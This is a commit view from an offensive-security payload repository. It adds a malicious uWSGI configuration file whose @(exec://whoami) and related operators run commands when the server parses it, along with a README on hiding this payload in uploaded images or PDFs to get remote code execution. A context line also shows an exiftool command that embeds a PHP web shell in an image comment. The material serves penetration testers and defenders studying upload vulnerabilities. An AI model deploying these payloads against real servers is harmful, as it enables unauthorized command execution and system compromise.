mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
add uwsgi configuration file to Upload Insecure File
This commit is contained in:
parent
7ef9babc9f
commit
5f8b3f8a14
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
# uWSGI configuration file
|
||||||
|
|
||||||
|
uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
|
||||||
|
|
||||||
|
Example of malicious uwsgi.ini file:
|
||||||
|
|
||||||
|
```ini
|
||||||
|
[uwsgi]
|
||||||
|
; read from a symbol
|
||||||
|
foo = @(sym://uwsgi_funny_function)
|
||||||
|
; read from binary appended data
|
||||||
|
bar = @(data://[REDACTED])
|
||||||
|
; read from http
|
||||||
|
test = @(http://[REDACTED])
|
||||||
|
; read from a file descriptor
|
||||||
|
content = @(fd://[REDACTED])
|
||||||
|
; read from a process stdout
|
||||||
|
body = @(exec://whoami)
|
||||||
|
; call a function returning a char *
|
||||||
|
characters = @(call://uwsgi_func)
|
||||||
|
```
|
||||||
|
|
||||||
|
When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
|
||||||
|
|
||||||
|
## uWSGI lax parsing
|
||||||
|
|
||||||
|
The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...).
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
|
||||||
|
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||||
|
|
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
[uwsgi]
|
||||||
|
; read from a symbol
|
||||||
|
foo = @(sym://uwsgi_funny_function)
|
||||||
|
; read from binary appended data
|
||||||
|
bar = @(data://[REDACTED])
|
||||||
|
; read from http
|
||||||
|
test = @(http://[REDACTED])
|
||||||
|
; read from a file descriptor
|
||||||
|
content = @(fd://[REDACTED])
|
||||||
|
; read from a process stdout
|
||||||
|
body = @(exec://whoami)
|
||||||
|
; call a function returning a char *
|
||||||
|
characters = @(call://uwsgi_func)
|
@ -136,12 +136,14 @@ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __h
|
|||||||
If you are trying to upload files to a :
|
If you are trying to upload files to a :
|
||||||
- PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
|
- PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
|
||||||
- ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
|
- ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
|
||||||
|
- uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
|
||||||
|
|
||||||
Configuration files examples
|
Configuration files examples
|
||||||
- [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
|
- [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
|
||||||
- [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
|
- [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
|
||||||
- [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
|
- [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
|
||||||
- [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
|
- [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
|
||||||
|
- [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini)
|
||||||
|
|
||||||
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
|
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
|
||||||
- package.json
|
- package.json
|
||||||
@ -214,3 +216,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
|||||||
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
||||||
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
||||||
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
|
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
|
||||||
|
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||||
|
Loading…
Reference in New Issue
Block a user